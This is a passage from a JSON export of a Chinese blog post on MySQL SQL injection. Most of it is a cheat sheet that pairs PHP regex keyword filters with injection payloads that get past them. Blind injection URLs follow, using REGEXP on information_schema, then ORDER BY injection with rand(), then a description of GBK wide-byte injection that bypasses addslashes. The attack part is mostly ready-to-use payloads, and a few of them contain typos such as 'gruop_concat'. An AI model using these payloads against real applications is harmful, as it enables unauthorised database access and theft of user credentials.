1=1<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>\u4e0b\u9762\u8fd9\u79cd\u65b9\u5f0f\u4f60\u9700\u8981\u5df2\u7ecf\u77e5\u9053\u4e00\u4e9b\u8868\u548c\u5b57\u6bb5\u540d\uff08\u53ef\u4ee5\u5229\u7528substring\u51fd\u6570\u53bb\u4e00\u4e2a\u4e00\u4e2a\u83b7\u5f97information_schema.columns\u8868\u4e2d\u7684\u6570\u636e\uff09<\/p>\n<table>\n<tbody>\n<tr>\n<td>\u8fc7\u6ee4\u5173\u952e\u5b57<\/td>\n<td>and or union<\/td>\n<\/tr>\n<tr>\n<td>php\u4ee3\u7801<\/td>\n<td>preg_match(&#8216;\/(and|or|union)\/i&#8217;,$id)<\/td>\n<\/tr>\n<tr>\n<td>\u4f1a\u8fc7\u6ee4\u7684\u653b\u51fb\u4ee3\u7801<\/td>\n<td>union select user,password from users<\/td>\n<\/tr>\n<tr>\n<td>\u7ed5\u8fc7\u65b9\u5f0f<\/td>\n<td>1 &amp;&amp; (select user from users where userid=1)=&#8217;admin&#8217;<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<table>\n<tbody>\n<tr>\n<td>\u8fc7\u6ee4\u5173\u952e\u5b57<\/td>\n<td>and or union where<\/td>\n<\/tr>\n<tr>\n<td>php\u4ee3\u7801<\/td>\n<td>preg_match(&#8216;\/(and|or|union|where)\/i&#8217;,$id)<\/td>\n<\/tr>\n<tr>\n<td>\u4f1a\u8fc7\u6ee4\u7684\u653b\u51fb\u4ee3\u7801<\/td>\n<td>1 &amp;&amp; (select user from users where user_id = 1) = &#8216;admin&#8217;<\/td>\n<\/tr>\n<tr>\n<td>\u7ed5\u8fc7\u65b9\u5f0f<\/td>\n<td>1 &amp;&amp; (select user from users limit 1) = &#8216;admin&#8217;<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<table>\n<tbody>\n<tr>\n<td>\u8fc7\u6ee4\u5173\u952e\u5b57<\/td>\n<td>and or union where<\/td>\n<\/tr>\n<tr>\n<td>php\u4ee3\u7801<\/td>\n<td>preg_match(&#8216;\/(and|or|union|where)\/i&#8217;,$id)<\/td>\n<\/tr>\n<tr>\n<td>\u4f1a\u8fc7\u6ee4\u7684\u653b\u51fb\u4ee3\u7801<\/td>\n<td>1 &amp;&amp; (select user from users where user_id = 1) = &#8216;admin&#8217;<\/td>\n<\/tr>\n<tr>\n<td>\u7ed5\u8fc7\u65b9\u5f0f<\/td>\n<td>1 &amp;&amp; (select user from users limit 1) = &#8216;admin&#8217;<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<table>\n<tbody>\n<tr>\n<td>\u8fc7\u6ee4\u5173\u952e\u5b57<\/td>\n<td>and, or, union, where, limit<\/td>\n<\/tr>\n<tr>\n<td>php\u4ee3\u7801<\/td>\n<td>preg_match(&#8216;\/(and|or|union|where|limit)\/i&#8217;, $id)<\/td>\n<\/tr>\n<tr>\n<td>\u4f1a\u8fc7\u6ee4\u7684\u653b\u51fb\u4ee3\u7801<\/td>\n<td>1 &amp;&amp; (select user from users limit 1) = &#8216;admin&#8217;<\/td>\n<\/tr>\n<tr>\n<td>\u7ed5\u8fc7\u65b9\u5f0f<\/td>\n<td>1 &amp;&amp; (select user from users group by user_id having user_id = 1) = &#8216;admin&#8217;#user_id\u805a\u5408\u4e2duser_id\u4e3a1\u7684user\u4e3aadmin<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<table>\n<tbody>\n<tr>\n<td>\u8fc7\u6ee4\u5173\u952e\u5b57<\/td>\n<td>and, or, union, where, limit, group by<\/td>\n<\/tr>\n<tr>\n<td>php\u4ee3\u7801<\/td>\n<td>preg_match(&#8216;\/(and|or|union|where|limit|group by)\/i&#8217;, $id)<\/td>\n<\/tr>\n<tr>\n<td>\u4f1a\u8fc7\u6ee4\u7684\u653b\u51fb\u4ee3\u7801<\/td>\n<td>1 &amp;&amp; (select user from users group by user_id having user_id = 1) = &#8216;admin&#8217;<\/td>\n<\/tr>\n<tr>\n<td>\u7ed5\u8fc7\u65b9\u5f0f<\/td>\n<td>1 &amp;&amp; (select substr(group_concat(user_id),1,1) user from users ) = 1<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<table>\n<tbody>\n<tr>\n<td>\u8fc7\u6ee4\u5173\u952e\u5b57<\/td>\n<td>and, or, union, where, limit, group by, select<\/td>\n<\/tr>\n<tr>\n<td>php\u4ee3\u7801<\/td>\n<td>preg_match(&#8216;\/(and|or|union|where|limit|group by|select)\/i&#8217;, $id)<\/td>\n<\/tr>\n<tr>\n<td>\u4f1a\u8fc7\u6ee4\u7684\u653b\u51fb\u4ee3\u7801<\/td>\n<td>1 &amp;&amp; (select substr(gruop_concat(user_id),1,1) user from users) = 1<\/td>\n<\/tr>\n<tr>\n<td>\u7ed5\u8fc7\u65b9\u5f0f<\/td>\n<td>1 &amp;&amp; substr(user,1,1) = &#8216;a&#8217;<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<table>\n<tbody>\n<tr>\n<td>\u8fc7\u6ee4\u5173\u952e\u5b57<\/td>\n<td>and, or, union, where, limit, group by, select, &#8216;<\/td>\n<\/tr>\n<tr>\n<td>php\u4ee3\u7801<\/td>\n<td>preg_match(&#8216;\/(and|or|union|where|limit|group by|select|\\&#8217;)\/i&#8217;, $id)<\/td>\n<\/tr>\n<tr>\n<td>\u4f1a\u8fc7\u6ee4\u7684\u653b\u51fb\u4ee3\u7801<\/td>\n<td>1 &amp;&amp; (select substr(gruop_concat(user_id),1,1) user from users) = 1<\/td>\n<\/tr>\n<tr>\n<td>\u7ed5\u8fc7\u65b9\u5f0f<\/td>\n<td>1 &amp;&amp; user_id is not null 1 &amp;&amp; substr(user,1,1) = 0x61 1 &amp;&amp; substr(user,1,1) = unhex(61)<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<table>\n<tbody>\n<tr>\n<td>\u8fc7\u6ee4\u5173\u952e\u5b57<\/td>\n<td>and, or, union, where, limit, group by, select, &#8216;, hex<\/td>\n<\/tr>\n<tr>\n<td>php\u4ee3\u7801<\/td>\n<td>preg_match(&#8216;\/(and|or|union|where|limit|group by|select|\\&#8217;|hex)\/i&#8217;, $id)<\/td>\n<\/tr>\n<tr>\n<td>\u4f1a\u8fc7\u6ee4\u7684\u653b\u51fb\u4ee3\u7801<\/td>\n<td>1 &amp;&amp; substr(user,1,1) = unhex(61)<\/td>\n<\/tr>\n<tr>\n<td>\u7ed5\u8fc7\u65b9\u5f0f<\/td>\n<td>1 &amp;&amp; substr(user,1,1) = lower(conv(11,10,16)) #\u5341\u8fdb\u5236\u768411\u8f6c\u5316\u4e3a\u5341\u516d\u8fdb\u5236\uff0c\u5e76\u5c0f\u5199\u3002<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<table>\n<tbody>\n<tr>\n<td>\u8fc7\u6ee4\u5173\u952e\u5b57<\/td>\n<td>and, or, union, where, limit, group by, select, &#8216;, hex, substr<\/td>\n<\/tr>\n<tr>\n<td>php\u4ee3\u7801<\/td>\n<td>preg_match(&#8216;\/(and|or|union|where|limit|group by|select|\\&#8217;|hex|substr)\/i&#8217;, $id)<\/td>\n<\/tr>\n<tr>\n<td>\u4f1a\u8fc7\u6ee4\u7684\u653b\u51fb\u4ee3\u7801<\/td>\n<td>1 &amp;&amp; substr(user,1,1) = lower(conv(11,10,16))\/td&gt;<\/td>\n<\/tr>\n<tr>\n<td>\u7ed5\u8fc7\u65b9\u5f0f<\/td>\n<td>1 &amp;&amp; lpad(user,7,1)<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<table>\n<tbody>\n<tr>\n<td>\u8fc7\u6ee4\u5173\u952e\u5b57<\/td>\n<td>and, or, union, where, limit, group by, select, &#8216;, hex, substr, \u7a7a\u683c<\/td>\n<\/tr>\n<tr>\n<td>php\u4ee3\u7801<\/td>\n<td>preg_match(&#8216;\/(and|or|union|where|limit|group by|select|\\&#8217;|hex|substr|\\s)\/i&#8217;, $id)<\/td>\n<\/tr>\n<tr>\n<td>\u4f1a\u8fc7\u6ee4\u7684\u653b\u51fb\u4ee3\u7801<\/td>\n<td>1 &amp;&amp; lpad(user,7,1)\/td&gt;<\/td>\n<\/tr>\n<tr>\n<td>\u7ed5\u8fc7\u65b9\u5f0f<\/td>\n<td>1%0b||%0blpad(user,7,1)<\/td>\n<\/tr>\n<tr>\n<td>\u8fc7\u6ee4\u5173\u952e\u5b57<\/td>\n<td>and or union where<\/td>\n<\/tr>\n<tr>\n<td>php\u4ee3\u7801<\/td>\n<td>preg_match(&#8216;\/(and|or|union|where)\/i&#8217;,$id)<\/td>\n<\/tr>\n<tr>\n<td>\u4f1a\u8fc7\u6ee4\u7684\u653b\u51fb\u4ee3\u7801<\/td>\n<td>1 || (select user from users where user_id = 1) = &#8216;admin&#8217;<\/td>\n<\/tr>\n<tr>\n<td>\u7ed5\u8fc7\u65b9\u5f0f<\/td>\n<td>1 || (select user from users limit 1) = &#8216;admin&#8217;<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h4>\u5229\u7528\u6b63\u5219\u8868\u8fbe\u5f0f\u8fdb\u884c\u76f2\u6ce8<\/h4>\n<p>\u6211\u4eec\u90fd\u5df2\u7ecf\u77e5\u9053\uff0c\u5728MYSQL 5+\u4e2d information_schema\u5e93\u4e2d\u5b58\u50a8\u4e86\u6240\u6709\u7684 \u5e93\u540d\uff0c\u8868\u660e\u4ee5\u53ca\u5b57\u6bb5\u540d\u4fe1\u606f\u3002\u6545\u653b\u51fb\u65b9\u5f0f\u5982\u4e0b\uff1a<br \/>\n1\u3001\u5224\u65ad\u7b2c\u4e00\u4e2a\u8868\u540d\u7684\u7b2c\u4e00\u4e2a\u5b57\u7b26\u662f\u5426\u662fa-z\u4e2d\u7684\u5b57\u7b26,\u5176\u4e2dblind_sqli\u662f\u5047\u8bbe\u5df2\u77e5\u7684\u5e93\u540d\u3002<\/p>\n<pre class=\"highlight\">index.php?id=1 and 1=(SELECT 1 FROM information_schema.tables WHERE TABLE_SCHEMA=\"blind_sqli\" AND table_name REGEXP '^[a-z]' LIMIT 0,1) \/*\n<\/pre>\n<p>2\u3001\u5224\u65ad\u7b2c\u4e00\u4e2a\u5b57\u7b26\u662f\u5426\u662fa-n\u4e2d\u7684\u5b57\u7b26<\/p>\n<pre class=\"highlight\">index.php?id=1 and 1=(SELECT 1 FROM information_schema.tables  WHERE TABLE_SCHEMA=\"blind_sqli\" AND table_name REGEXP '^[a-n]' LIMIT 0,1)\/*\n<\/pre>\n<p>3\u3001\u786e\u5b9a\u8be5\u5b57\u7b26\u4e3an<\/p>\n<pre class=\"highlight\">index.php?id=1 and 1=(SELECT 1 FROM information_schema.tables  WHERE TABLE_SCHEMA=\"blind_sqli\" AND table_name REGEXP '^n' LIMIT 0,1) \/*\n<\/pre>\n<p>4\u3001\u8868\u8fbe\u5f0f\u7684\u66f4\u6362\u5982\u4e0b<\/p>\n<pre class=\"highlight\">'^n[a-z]' -&gt; '^ne[a-z]' -&gt; '^new[a-z]' -&gt; '^news[a-z]' -&gt; FALSE \n<\/pre>\n<p>\u8fd9\u65f6\u8bf4\u660e\u8868\u540d\u4e3anews \uff0c\u8981\u9a8c\u8bc1\u662f\u5426\u662f\u8be5\u8868\u660e \u6b63\u5219\u8868\u8fbe\u5f0f\u4e3a&#8217;^news$&#8217;\uff0c\u4f46\u662f\u6ca1\u8fd9\u5fc5\u8981 \u76f4\u63a5\u5224\u65ad table_name = &#8216;news&#8217; \u4e0d\u5c31\u884c\u4e86\u3002<br \/>\n5\u3001\u63a5\u4e0b\u6765\u731c\u89e3\u5176\u5b83\u8868\u4e86 \u53ea\u9700\u8981\u4fee\u6539 limit 1,1 -&gt; limit 2,1\u5c31\u53ef\u4ee5\u5bf9\u63a5\u4e0b\u6765\u7684\u8868\u8fdb\u884c\u76f2\u6ce8\u4e86\u3002<\/p>\n<h4>order by\u540e\u7684\u6ce8\u5165<\/h4>\n<p>oder by\u7531\u4e8e\u662f\u6392\u5e8f\u8bed\u53e5\uff0c\u6240\u4ee5\u53ef\u4ee5\u5229\u7528\u6761\u4ef6\u8bed\u53e5\u505a\u5224\u65ad\uff0c\u6839\u636e\u8fd4\u56de\u7684\u6392\u5e8f\u7ed3\u679c\u4e0d\u540c\u5224\u65ad\u6761\u4ef6\u7684\u771f\u5047\u3002<br \/>\n\u4e00\u822c\u5e26\u6709oder\u6216\u8005orderby\u7684\u53d8\u91cf\u5f88\u53ef\u80fd\u662f\u8fd9\u79cd\u6ce8\u5165\uff0c\u5728\u77e5\u9053\u4e00\u4e2a\u5b57\u6bb5\u7684\u65f6\u5019\u53ef\u4ee5\u91c7\u7528\u5982\u4e0b\u65b9\u5f0f\u6ce8\u5165\uff1a<br \/>\n\u539f\u59cb\u94fe\u63a5\uff1ahttp:\/\/www.test.com\/list.php?order=vote \u6839\u636evote\u5b57\u6bb5\u6392\u5e8f\u3002<br \/>\n\u627e\u5230\u6295\u7968\u6570\u6700\u5927\u7684\u7968\u6570num\u7136\u540e\u6784\u9020\u4ee5\u4e0b\u94fe\u63a5\uff1a<\/p>\n<pre class=\"highlight\">http:\/\/www.test.com\/list.php?order=abs(vote-(length(user())&gt;0)*num)+asc\n<\/pre>\n<p>\u770b\u6392\u5e8f\u662f\u5426\u53d8\u5316\u3002<br \/>\n\u8fd8\u6709\u4e00\u79cd\u65b9\u6cd5\u4e0d\u9700\u8981\u77e5\u9053\u4efb\u4f55\u5b57\u6bb5\u4fe1\u606f\uff0c\u4f7f\u7528rand\u51fd\u6570\uff1a<\/p>\n<pre class=\"highlight\">http:\/\/www.test.com\/list.php?order=rand(true)\nhttp:\/\/www.test.com\/list.php?order=rand(false)\n<\/pre>\n<p>\u4ee5\u4e0a\u4e24\u4e2a\u4f1a\u8fd4\u56de\u4e0d\u540c\u7684\u6392\u5e8f\uff0c\u5224\u65ad\u8868\u540d\u4e2d\u7b2c\u4e00\u4e2a\u5b57\u7b26\u662f\u5426\u5c0f\u4e8e128\u7684\u8bed\u53e5\u5982\u4e0b\uff1a<\/p>\n<pre class=\"highlight\">http:\/\/www.test.com\/list.php?order=rand((select char(substring(table_name,1,1)) from information_schema.tables limit 1)&lt;=128))\n<\/pre>\n<h4>\u5bbd\u5b57\u8282\u6ce8\u5165<\/h4>\n<p>sql\u6ce8\u5165\u4e2d\u7684\u5bbd\u5b57\u8282\u56fd\u5185\u6700\u5e38\u4f7f\u7528\u7684gbk\u7f16\u7801\uff0c\u8fd9\u79cd\u65b9\u5f0f\u4e3b\u8981\u662f\u7ed5\u8fc7addslashes\u7b49\u5bf9\u7279\u6b8a\u5b57\u7b26\u8fdb\u884c\u8f6c\u79fb\u7684\u7ed5\u8fc7\u3002\u53cd\u659c\u6760()\u7684\u5341\u516d\u8fdb\u5236\u4e3a%5c\uff0c\u5728\u4f60\u8f93\u5165%bf%27\u65f6\uff0c\u51fd\u6570\u9047\u5230\u5355\u5f15\u53f7\u81ea\u52a8\u8f6c\u79fb\u52a0\u5165\\\uff0c\u6b64\u65f6\u53d8\u4e3a%bf%5c%27\uff0c%bf%5c\u5728gbk\u4e2d\u53d8\u4e3a\u4e00\u4e2a\u5bbd\u5b57\u7b26\u201c\u7e17\u201d\u3002%bf\u90a3\u4e2a\u4f4d\u7f6e\u53ef\u4ee5\u662f%81-%fe\u4e2d\u95f4\u7684\u4efb\u4f55\u5b57\u7b26\u3002\u4e0d\u6b62\u5728sql\u6ce8\u5165\u4e2d\uff0c\u5bbd\u5b57\u7b26\u6ce8\u5165\u5728\u5f88\u591a\u5730\u65b9\u90fd\u53ef\u4ee5\u5e94\u7528\u3002<br \/>\n<\/section>\n","protected":false},"excerpt":{"rendered":"<p>\u9ed8\u8ba4\u5b58\u5728\u7684\u6570\u636e\u5e93\uff1a mysql \u9700\u8981root\u6743\u9650\u8bfb\u53d6 information_schema \u57285\u4ee5\u4e0a\u7684\u7248\u672c\u4e2d\u5b58 [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[180],"tags":[369],"_links":{"self":[{"href":"http:\/\/www.huike007.cn\/index.php?rest_route=\/wp\/v2\/posts\/439"}],"collection":[{"href":"http:\/\/www.huike007.cn\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.huike007.cn\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.huike007.cn\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.huike007.cn\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=439"}],"version-history":[{"count":1,"href":"http:\/\/www.huike007.cn\/index.php?rest_route=\/wp\/v2\/posts\/439\/revisions"}],"predecessor-version":[{"id":440,"href":"http:\/\/www.huike007.cn\/index.php?rest_route=\/wp\/v2\/posts\/439\/revisions\/440"}],"wp:attachment":[{"href":"http:\/\/www.huike007.cn\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=439"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.huike007.cn\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=439"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.huike007.cn\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=439"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}